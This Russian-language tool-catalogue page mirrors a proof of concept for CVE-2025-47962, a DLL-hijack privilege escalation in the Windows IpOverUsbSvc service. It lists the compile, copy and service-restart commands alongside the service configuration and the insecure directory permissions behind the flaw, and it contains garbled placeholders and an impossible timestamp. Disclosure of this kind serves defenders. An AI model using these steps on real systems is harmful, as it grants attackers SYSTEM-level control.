Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-47962-POC — Доказательство концепции для CVE-2025-47962, демонстрирующее локальное повышение привилегий через перехват DLL в службе Windows IpOverUsbSvc из-за небезопасных разрешений каталогов. | Kitploit
Инструменты/GitHubGitHub/q1uf3ng/cve-2025-47962-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияЛатеральное перемещениеЭксплуатация Бинарных Файлов
GitHubq1uf3ng/cve-2025-47962-poc

CVE-2025-47962-POC

Доказательство концепции для CVE-2025-47962, демонстрирующее локальное повышение привилегий через перехват DLL в службе Windows IpOverUsbSvc из-за небезопасных разрешений каталогов.

Репозиторий
418 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-47962-POC

Процесс воспроизведения: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32

copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"

net stop IpOverUsbSvc net start IpOverUsbSvc 图片

Объяснение: IpOverUsbSvc

root@kitploit:~
sc.exe qc IpOverUsbSvc

SERVICE_NAME: IpOverUsbSvc
TYPE               : 10  WIN32_OWN_PROCESS
START_TYPE         : 2   AUTO_START
BINARY_PATH_NAME   : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem

Запускается с привилегиями LocalSystem. Исполняемый файл находится в каталоге C:\Microsoft Shared, над которым обычные пользователи имеют полный контроль доступа. Было обнаружено, что обычные пользователи могут записывать файлы в системный каталог служб. Затем отслеживаем DLL 图片 图片 图片

Разрешения для каталога C:\Microsoft Shared, созданного при установке Windows SDK, настроены некорректно:

root@kitploit:~
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)
Скачать инструмент